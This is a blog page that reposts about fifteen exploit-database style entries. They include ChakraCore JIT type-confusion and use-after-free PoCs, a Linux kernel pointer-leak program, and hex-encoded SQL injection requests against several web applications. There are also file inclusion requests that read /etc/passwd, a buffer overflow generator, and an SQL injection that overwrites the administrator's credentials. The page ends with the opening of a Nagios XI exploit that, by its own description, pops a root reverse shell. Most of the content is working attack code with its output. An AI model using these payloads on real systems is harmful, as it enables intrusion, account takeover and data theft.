Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863588219

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
/*
The JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode method is used to execute JsBuiltIn.js which initializes some builtin objects. Because it's essentially written in JavaScript, it needs to clear the disable-implicit-call flag before calling the JavaScript code, otherwise it might not work properly. The problem is, it doesn't restore the prevous status of the flag after the call. As setting the flag can prevent stack-allocated objects from leaking, this clearing-the-flag bug can lead to a stack-based use-after-free.

To exploit this bug, it's needed to build a chain that first clears the flag by calling the vulnerable method and then leaks the stack-allocated object. This is done with the Error.prototype.toString method (marked as having no side effects) which calls the "toString" method on the "name" property and the "message" property of the "this" object. So when it accesses the "name" property, it clears the flag and leaks the "this" object when it accesses the "message" property.

PoC:
*/

function opt() {
    let o = {};  // stack-allocated object
    o.x;  // under with DisableImplicitFlags set
}

function main() {
    for (let i = 0; i < 10000; i++) {
        opt();
    }

    let leaked_stack_object = null;
    let object_prototype = ({}).__proto__;
    object_prototype.__defineGetter__('x', Error.prototype.toString);
    object_prototype.__defineGetter__('message', function () {
        delete object_prototype.message;

        leaked_stack_object = this;
    });

    object_prototype.name = Array.prototype;  // access to Array.prototype will call JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode.

    opt();

    alert(leaked_stack_object);
}

main();
HireHackking 
/*

Issue description

This is similar to  issue 1702 (https://www.exploit-db.com/exploits/46203) . This time, it uses an InitClass instruction to reach the SetIsPrototype method.

PoC:
*/

function opt(o, c, value) {
    o.b = 1;

    class A extends c {

    }

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, (function () {}), {});
    }

    let o = {a: 1, b: 2};
    let cons = function () {};

    cons.prototype = o;

    opt(o, cons, 0x1234);

    print(o.a);
}

main();
HireHackking 
NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.

In the PoC, it overwrites the pointer to property slots with 0x1000000001234. 

PoC for NewScObjectNoCtor:

function cons() {

}

function opt(o, value) {
    o.b = 1;

    new cons();

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        cons.prototype = {};

        let o = {a: 1, b: 2};
        opt(o, {});
    }

    let o = {a: 1, b: 2};

    cons.prototype = o;

    opt(o, 0x1234);

    print(o.a);
}

main();

PoC for InitProto:

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, 0x1234);

    print(o.a);
}

main();
HireHackking 
# Exploit Title: Coman - Company Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-20
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ragob.com/
# Software Link: https://codecanyon.net/item/coman-company-management-system/17799270
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php/framework-crud-detailaction?crud=task&id=[SQL]&backTo=dashboard
# 

GET /[PATH]/index.php/framework-crud-detailaction?crud=task&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 12:59:10 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
HireHackking 
#define _GNU_SOURCE
#define _BSD_SOURCE
#include <sys/timex.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <kptr-lib.h>

// Ubuntu 4.13.0-16-generic
// gcc -o poc poc.c -m32

struct timex time;

int main(int argc, char **argv)
{
	int r;
	unsigned long long stack_offset, kernel_base;
	unsigned int leak_value;
	unsigned int high = 0xffffffff;
	
	memset(&time, 0, sizeof(time));
	time.modes = 0x8000;

	mmap(0,0xa000,3,2022,-1,0);

	adjtimex(&time);    
	leak_value = time.tai;
	printf("--> leak_value : %x\n", leak_value);
	
	memcpy(&kernel_base, &leak_value, 4);
	memcpy((char *)&kernel_base + 4, &high, 4);
	stack_offset = 0x1fc4a4;
	kernel_base = leak_value - stack_offset;
	printf("--> kernel_stack_base : %llx\n", kernel_base);

 	return 0;
}
HireHackking 
# Exploit Title: Reservic - Reserves Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-20
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ragob.com/
# Software Link: https://codecanyon.net/item/reservic-reserves-management-system/11736786
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php/framework-crud-detailaction?crud=reserves&id=[SQL]&backTo=dashboard
# 

GET /[PATH]/index.php/framework-crud-detailaction?crud=reserves&id=4+%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 13:01:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
HireHackking 
# Exploit Title: PHP Dashboards NEW 5.8 - SQL Injection
# Dork: N/A
# Date: 2019-01-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://dataninja.biz
# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/php/save/savedescriptions.php?dashID=[SQL]
# 

GET /[PATH]/php/save/savedescriptions.php?dashID=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%31%31%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 21:08:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Host-Header: 192fc2e7e50945beb8231a492d6a8024
X-Proxy-Cache: MISS
HireHackking 
# Exploit Title: MoneyFlux - Cashflow Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2019-01-20
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://ragob.com/
# Software Link: https://codecanyon.net/item/moneyflux-laravel-5-cashflow-system/21577611
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php/framework-crud-updateaction?id=[SQL]&crud=expense
# 

GET /[PATH]/index.php/framework-crud-updateaction?id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20AS+%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&crud=expense HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 12:39:58 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
HireHackking 
#!/usr/bin/python

# Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)
# Date: 21-01-2019
# Software Link: https://sourceforge.net/projects/echomirage.oldbutgold.p/
# Version: 3.1 (x64)
# Exploit Author: InitD Community
# Contact: https://twitter.com/initd_sh
# Website: http://initd.sh/
# Tested on: Windows 7


"""
Step to Reproduce : Open Echo Mirage --> 1) Click on "Rules" --> 2) click on "New" --> 3)Copy "Echo-Mirage-BoF-POC.txt" content and Paste  in "action" field. --> BOoo0m.

Thanks: Touhid M.Shaikh(@touhidshaikh22), Shrutirupa(@creak_crypt)
This Bug Identified by Touhid M.Shaikh
"""

buffer = "A"*24241

RBP = "B"*8

PAD = "C"*50

evil = buffer + RBP + PAD


evil_file = open("Echo-Mirage-BoF-POC.txt","w")

evil_file.write(evil)

evil_file.close()
HireHackking 
Exploit Title: stack-based overflow
# Date: 2019-11-21
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://labapart.com/
# Software Link: https://github.com/labapart/gattlib/issues/81
# Version: 0.2
# Tested on: Linux 4.15.0-38-generic
# CVE: CVE-2019-6498
# References:
# https://github.com/labapart/gattlib/issues/81
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6498

## Summary:
While fuzzing gattlib (Gattlib is a library to access GATT information from
BLE (Bluetooth Low Energy) devices) using clang 6.0 with ASAN a stack-based
buffer-overflow was observed.

## Vulnerable code from gattlib.c
// Transform string from 'DA:94:40:95:E0:87' to 'dev_DA_94_40_95_E0_87'
strncpy(device_address_str, dst, sizeof(device_address_str));
for (i = 0; i < strlen(device_address_str); i++) {
if (device_address_str[i] == ':') {
device_address_str[i] = '_';
}
}

## Vulnerable code from discover.c
if (argc != 2) {
printf("%s <device_address>\n", argv[0]);
return 1;
}

connection = gattlib_connect(NULL, argv[1], BDADDR_LE_PUBLIC, BT_SEC_LOW,
0, 0);
if (connection == NULL) {
fprintf(stderr, "Fail to connect to the bluetooth device.\n");
return 1;
}

## PoC

./discover `python -c 'print "A"*20'`

## MSF code

def exploit
    connect

    print_status("Sending #{payload.encoded.length} byte payload...")

    # Building the buffer for transmission
    buf = "A" * 20
    buf += [ target.ret ].pack('V')
    buf += payload.encoded

    sock.put(buf)
    sock.get

    handler
end
HireHackking 
# Exploit Title: PHP Dashboards NEW 5.8 - Local File Inclusion
# Dork: N/A
# Date: 2019-01-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://dataninja.biz
# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/php/file/read.php
# 

POST /[PATH]/php/file/read.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
filename=../../../../../../etc/passwd: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 20:56:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024
HireHackking 
# Exploit Title: PHP Uber-style GeoTracking 1.1 - SQL Injection
# Dork: N/A
# Date: 2019-01-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://dataninja.biz
# Software Link: https://codecanyon.net/item/php-uberstyle-geotracking/20320021
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/php/profile/index.php
# 

POST /[PATH]/php/profile/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 354
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 21:47:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024

# POC: 
# 2)
# http://localhost/[PATH]/php/profile/index.php
# 

POST /[PATH]/php/profile/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 355
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
mapkey=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 21:46:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024

# POC: 
# 3)
# http://localhost/[PATH]/php/photos/index.php
# 

POST /[PATH]/php/photos/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2d%2d%20%2d: undefined
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 21:49:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024
HireHackking 
# Exploit Title: [SQL Injection in Adianti Framework]
# Date: [2018-12-18]
# Exploit Author: [Joner de Mello Assolin]
# Vendor Homepage: [https://www.adianti.com.br]
# Version: [5.5.0 and 5.6.0] (REQUIRED)
# Tested on: [XAMPP Version 7.2.2, phpMyAdmin 4.7.7 and 4.8.4, PHP 7.1 , Apache/2.4.29 (Win32) , libmysql - mysqlnd 5.0.12-dev – 20150407 and MariaDB 10.1]
# Software Link: [https://www.adianti.com.br/download-center?app=template]



The failure allows any ordinary user to enter SQL Injection and take over the administrator account or any other user of the system, 
by editing the profile itself.



POC:

1-Register an ordinary user or use the framework standard(user=user password=user)

2- Access the user profile and click edit http://localhost/template/index.php?class=SystemProfileForm&method=onEdit

3- In the field name enter SQL injection and click Save:

(SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT '294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT 'anonymous@anonymous.com')WHERE `id`=1#

4-Go to the login screen and enter username and password: Now you can log in as administrator!.

USER: anonymous

PASSWORD: anonymous
HireHackking 
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program    
[+] ZDI-CAN-7591


[Vendor]
www.microsoft.com


[Product]
Microsoft .CONTACT File

A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista.
This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.


[Vulnerability Type]
Mailto: HTML Link Injection Remote Code Execution


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The flaw is due to the processing of ".contact" files, the E-mail address field takes an expected E-mail address value, however the .CONTACT file is 
vulnerable to HTML injection as no validation is performed. Therefore, if an attacker references an executable file using an HREF tag it will run that
instead without warning instead of performing the expected email behavior. This is dangerous and would be unexpected to an end user.

The E-mail addresses Mailto: will point to an arbitrary executable like.
<a href="calc.exe">pwn@microsoft.com</a>

Additionally the executable file can live in a sub-directory and be referenced like "<a href="mydir\malicious.exe">pwn@microsoft.com</a>" or attackers can use
directory traversal techniques to point to a malware say sitting in the targets Downloads directory like:

<a href="..\..\..\..\Users\victim\Downloads\evil.exe">pwn@microsoft.com</a>

Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected using certain archive utils.

This advisory was initially one of three different vulnerabilities I reported to Zero Day Initiative Program (ZDI), that microsoft decided to not release a security fix
for and close. The first cases I reported to ZDI were .VCF and .CONTACT files Website address input fields.

This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known.


[Exploit/POC]
Create a Windows .CONTACT file and inject the following HTML into the E-mail: field

<a href="calc.exe">pwn@microsoft.com</a>

Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?"

Click Yes.

Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will execute.


Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will also execute! :)


[POC Video URL]
https://vimeo.com/312824315


[Disclosure Timeline]
Reported to ZDI 2018-11-22 (ZDI-CAN-7591)
Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019.
https://www.zerodayinitiative.com/advisories/ZDI-19-121/
Public disclosure : January 22, 2019
	 

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
HireHackking 
# Exploit Title: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
# Dork: N/A
# Date: 2019-01-22
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://joomtech.net/
# Software D.: https://www.joomtech.net/products/easyshop?task=file.download&key=7bafaa65995fb3b1383328105df1e10f
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/shopping-cart/easy-shop/
# Version: 1.2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=[BASE64_FILE_NAME]
# 

GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA= HTTP/1.1
GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: __cfduid=d11dd4447c0b8ef3cd8c4f6745ebdf50e1548111108; 6eecafb7a7a944789bd299deac1ff945=osde04ob1pgq9o3p8arfqtbobk
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 21 Jan 2019 23:58:02 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="http://localhost/[PATH]/"
Server: cloudflare
CF-RAY: 49cd621bce8f537e-LAX
Content-Encoding: br

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
....
HireHackking 
# Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation
# Date: 2019-01-22
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.nagios.com/
# Product: Nagios XI
# Software Link: https://assets.nagios.com/downloads/nagiosxi/5/xi-5.5.6.tar.gz
# Version: From 2012r1.0 to 5.5.6
# Tested on: 
#	- CentOS Linux 7.5.1804 (Core) / Kernel 3.10.0 / This was a vendor-provided .OVA file
#	- Nagios XI 2012r1.0, 5r1.0, and 5.5.6
# CVE: CVE-2018-15708, CVE-2018-15710
#
# See Also:
# https://www.tenable.com/security/research/tra-2018-37
# https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172
#
# This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop a root reverse shell.
# You'll need your own Netcat listener

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import SocketServer, threading, ssl
import requests, urllib
import sys, os, argparse
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

TIMEOUT = 5 # sec

def err_and_exit(msg):
    print '\n\nERROR: ' + msg + '\n\n'
    sys.exit(1)

